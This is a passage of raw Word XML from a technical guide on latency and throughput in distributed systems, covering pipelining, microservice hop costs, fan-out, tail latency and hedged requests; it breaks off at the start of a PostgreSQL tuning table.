      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ideal system:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Low latency AND high throughput simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B5FFB2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How to achieve it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F1A72" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Over-provision capacity:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Run at 50% utilization → latency stays low (2x multiplier), throughput is still high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20464588" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eliminate serial bottlenecks:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Every serial component limits throughput AND increases latency (everything queues behind it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E63C23" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pipeline processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Break work into stages, process stages concurrently on different requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159DDA5E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CEFED8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Request 1: [Stage A] [Stage B] [Stage C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1713953D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Request 2:           [Stage A] [Stage B] [Stage C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655106CC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Request 3:                     [Stage A] [Stage B] [Stage C]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E9E71" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="44914931" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency per request: A + B + C (same as before)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1A542" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput: 1 request per max(A, B, C) (much higher!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DA140" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1431"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Async I/O (non-blocking):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> While one request waits for I/O, process other requests on the same thread. Keeps CPU busy → high throughput without adding latency to individual requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C01101" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="25A22D80">
          <v:rect id="_x0000_i5106" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50593DD6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Latency and Throughput in Distributed Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA618DB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 The Impact of Network Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2114426E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Each network hop adds latency AND limits throughput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21454AA2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CE611" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">Single service: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323035F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Latency: 5ms (local compute only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2145549E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: limited by local CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCBE3AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="57EA391D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Microservice chain (A → B → C → D):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9E02A6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency: 5ms + RTT(A→B) + 5ms + RTT(B→C) + 5ms + RTT(C→D) + 5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD87078" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">         = 20ms compute + 3 × 0.5ms = 21.5ms (same datacenter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FA773" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">         = 20ms compute + 3 × 100ms = 320ms (cross-region!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A7CA5C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310AEE42" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: limited by slowest service in chain AND available connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6334B8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fan-out amplification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EA290B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D357FA8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>One user request → API gateway → 5 backend services (in parallel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F4931" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Latency: max(service_1, service_2, ..., service_5) ← tail latency problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2057ABB4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: limited by the service with lowest capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62D621" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="10BDA39B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>One user request → API gateway → 5 services → each calls 3 more services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A2F33" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Total backend calls per user request: 5 + 15 = 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113192B8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  1000 user RPS → 20,000 internal RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6527E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput requirement amplified 20x by fan-out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2787B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Latency-Throughput at Datacenter Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598E2616" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intra-datacenter (same-AZ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D57F33B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721B0515" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network RTT: 0.1–0.5ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119EF0FD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>High throughput, low latency achievable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FE537" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Connections are cheap (pooled, low RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40593783" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Fan-out is cheap (parallel calls add ~0.5ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B36FD6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cross-AZ (same region):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D63704" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0958DD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network RTT: 1–2ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2E9E8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Slightly higher latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF43807" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput limited by BDP for single connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D166114" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Multiple connections or multiplexing needed for high throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E96EB8B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED724EF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0E554" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Network RTT: 50–200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A8EC7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Massive latency penalty (each call adds 50–200ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442411CE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Throughput limited: BDP constraint, expensive to saturate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CBD771" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Minimize cross-region calls (cache locally, replicate data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514C817" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Every cross-region call is a latency budget killer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D037B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 The Tail-at-Scale Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8B5974" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google's "The Tail at Scale" paper insight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF393D4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>When a request touches many servers (distributed storage, search index):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217AF9F1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D368CC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Single server p99: 10ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A681036" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Request queries 100 servers in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2542A0A4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>P(all 100 respond within 10ms) = (0.99)^100 = 36%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08196FD3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>P(at least one exceeds 10ms) = 64%!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3A6A0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="027C3214" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Effective request p99 is MUCH worse than individual server p99.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199D698" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA814E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hedged requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF5019" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Send request to 2 servers simultaneously. Use whichever responds first. Cancel the other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040A2DB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Doubles load (2x throughput cost) but dramatically reduces tail latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB461E2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1432"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Variant: send to one server. If no response within p95 latency, send to a second ("backup request"). Only 5% of requests are duplicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151BE908" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tied requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC787C8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Send to 2 servers but let them communicate: "I'm processing this, you can cancel."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1067C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1433"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Eliminates the duplicate processing (only one server does work).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39527C38" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Canary requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C743A86" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Send a lightweight probe first. If it responds slowly → try another server for the real request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5F9C7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1434"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:t>Uses throughput on the fast path, avoids slow paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C0BA0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="59B85BB8">
          <v:rect id="_x0000_i5107" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6EC25" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Throughput and Latency Tradeoffs in Specific Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E0AF4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E66FF5E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL tuning: throughput vs. latency tradeoffs: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558"/>
        <w:gridCol w:w="3348"/>
        <w:gridCol w:w="2444"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="4567C28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5F92FD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Setting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96C595" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Favors Throughput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26BE86" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Favors Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="23A34F2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9F1A40" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
